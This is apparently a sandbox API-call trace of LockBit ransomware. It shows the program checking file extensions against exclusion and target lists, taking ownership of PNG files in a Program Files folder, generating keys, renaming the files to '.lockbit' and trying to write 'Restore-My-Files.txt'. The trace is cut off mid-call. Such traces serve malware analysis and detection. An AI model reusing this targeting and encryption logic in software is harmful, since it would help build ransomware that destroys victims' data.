PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png") returned=".png" [0083.519] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0083.520] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0083.520] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0083.520] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0083.520] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0083.520] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0083.520] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0083.520] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0083.520] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0083.521] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0083.521] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0083.521] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png.lockbit") returned 82 [0083.521] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-back-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.521] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0083.522] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0083.522] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0083.522] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0083.522] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0083.522] RtlFreeAnsiString (AnsiString="\\") [0083.522] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0083.522] malloc (_Size=0x200) returned 0x77d800 [0083.522] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0083.522] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.522] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.522] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.523] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.523] CloseHandle (hObject=0x3b8) returned 1 [0083.523] free (_Block=0x77d800) [0083.524] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-back-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0083.524] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0083.524] malloc (_Size=0x40068) returned 0x1fb18c0 [0083.524] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=1849) returned 1 [0083.524] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.525] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0083.525] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.525] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0083.525] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0084.134] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.134] malloc (_Size=0xba) returned 0x1ff1e60 [0084.134] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xba, FileInformationClass=0xa) returned 0xc0000008 [0084.134] free (_Block=0x1ff1e60) [0084.134] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.134] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.134] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.135] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72454746, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72454746, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6905b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pets_btn-next-over-select.png", cAlternateFileName="")) returned 1 [0084.135] lstrcmpiW (lpString1=".", lpString2="Pets_btn-next-over-select.png") returned -1 [0084.135] lstrcmpiW (lpString1="..", lpString2="Pets_btn-next-over-select.png") returned -1 [0084.135] PathFindExtensionW (pszPath="Pets_btn-next-over-select.png") returned=".png" [0084.135] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0084.135] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0084.135] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0084.135] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0084.135] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0084.136] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0084.136] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0084.136] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.136] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0084.136] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0084.136] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0084.136] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0084.136] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0084.136] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0084.136] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0084.136] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0084.136] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0084.136] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0084.136] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0084.136] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0084.136] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0084.136] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0084.136] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0084.136] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0084.136] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0084.136] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.136] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0084.137] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0084.137] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0084.137] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0084.137] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pets_btn-next-over-select.png") returned 1 [0084.137] lstrcmpiW (lpString1="ntldr", lpString2="Pets_btn-next-over-select.png") returned -1 [0084.137] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pets_btn-next-over-select.png") returned -1 [0084.137] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pets_btn-next-over-select.png") returned -1 [0084.137] lstrcmpiW (lpString1="autorun.inf", lpString2="Pets_btn-next-over-select.png") returned -1 [0084.137] lstrcmpiW (lpString1="thumbs.db", lpString2="Pets_btn-next-over-select.png") returned 1 [0084.137] lstrcmpiW (lpString1="iconcache.db", lpString2="Pets_btn-next-over-select.png") returned -1 [0084.137] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.137] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png") returned=".png" [0084.137] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0084.137] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0084.137] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0084.137] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0084.137] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0084.137] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0084.137] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0084.137] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0084.137] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0084.137] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0084.137] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0084.137] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0084.137] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0084.138] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0084.138] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0084.138] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0084.138] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0084.138] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0084.138] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0084.138] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0084.138] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0084.138] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0084.138] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0084.138] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0084.138] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0084.138] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0084.138] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0084.138] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0084.138] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png.lockbit") returned 87 [0084.138] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-next-over-select.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.139] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.139] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.139] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.139] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.140] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.140] RtlFreeAnsiString (AnsiString="\\") [0084.140] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0084.140] malloc (_Size=0x200) returned 0x77d800 [0084.140] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.140] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.140] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.140] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.141] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.141] CloseHandle (hObject=0x3b8) returned 1 [0084.141] free (_Block=0x77d800) [0084.141] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-next-over-select.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0084.141] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.141] malloc (_Size=0x40068) returned 0x1fb18c0 [0084.141] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3016) returned 1 [0084.141] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.142] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0084.142] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.143] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0084.143] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.145] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.145] malloc (_Size=0xc4) returned 0x1ff1e60 [0084.145] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0084.146] free (_Block=0x1ff1e60) [0084.146] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.146] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.146] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.146] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7247a8a3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7247a8a3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6905b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x7f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pets_btn-next-static.png", cAlternateFileName="")) returned 1 [0084.146] lstrcmpiW (lpString1=".", lpString2="Pets_btn-next-static.png") returned -1 [0084.146] lstrcmpiW (lpString1="..", lpString2="Pets_btn-next-static.png") returned -1 [0084.146] PathFindExtensionW (pszPath="Pets_btn-next-static.png") returned=".png" [0084.146] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0084.146] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0084.146] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0084.146] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0084.147] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0084.147] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0084.147] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.147] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0084.147] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0084.148] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0084.148] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0084.148] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0084.148] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0084.148] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0084.148] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0084.148] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0084.148] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0084.148] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0084.148] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0084.148] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0084.148] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0084.148] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0084.148] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0084.148] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0084.148] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.148] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0084.148] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0084.148] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0084.148] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0084.148] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pets_btn-next-static.png") returned 1 [0084.148] lstrcmpiW (lpString1="ntldr", lpString2="Pets_btn-next-static.png") returned -1 [0084.149] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pets_btn-next-static.png") returned -1 [0084.149] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pets_btn-next-static.png") returned -1 [0084.149] lstrcmpiW (lpString1="autorun.inf", lpString2="Pets_btn-next-static.png") returned -1 [0084.149] lstrcmpiW (lpString1="thumbs.db", lpString2="Pets_btn-next-static.png") returned 1 [0084.149] lstrcmpiW (lpString1="iconcache.db", lpString2="Pets_btn-next-static.png") returned -1 [0084.149] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.149] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png") returned=".png" [0084.149] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0084.149] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0084.149] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0084.149] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0084.149] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0084.149] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0084.149] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0084.149] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0084.149] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0084.149] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0084.149] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0084.149] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0084.149] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0084.149] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0084.149] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0084.149] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0084.150] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0084.150] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0084.150] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0084.150] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0084.150] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0084.150] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0084.150] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0084.150] lstrcmpiW (lpString1=".sql", 